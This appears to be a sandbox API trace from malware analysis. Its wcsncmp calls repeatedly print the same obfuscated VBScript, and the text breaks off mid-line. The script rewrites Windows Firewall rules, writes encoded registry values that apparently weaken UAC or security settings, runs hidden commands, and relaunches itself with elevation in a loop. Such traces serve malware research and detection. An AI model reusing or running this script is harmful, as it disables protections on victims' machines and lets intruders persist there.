_String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0222.986] wcsncmp (_String1="OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0222.986] wcsncmp (_String1="UT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 72 [0222.986] wcsncmp (_String1="T = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0222.986] wcsncmp (_String1=" = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.986] wcsncmp (_String1="= 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 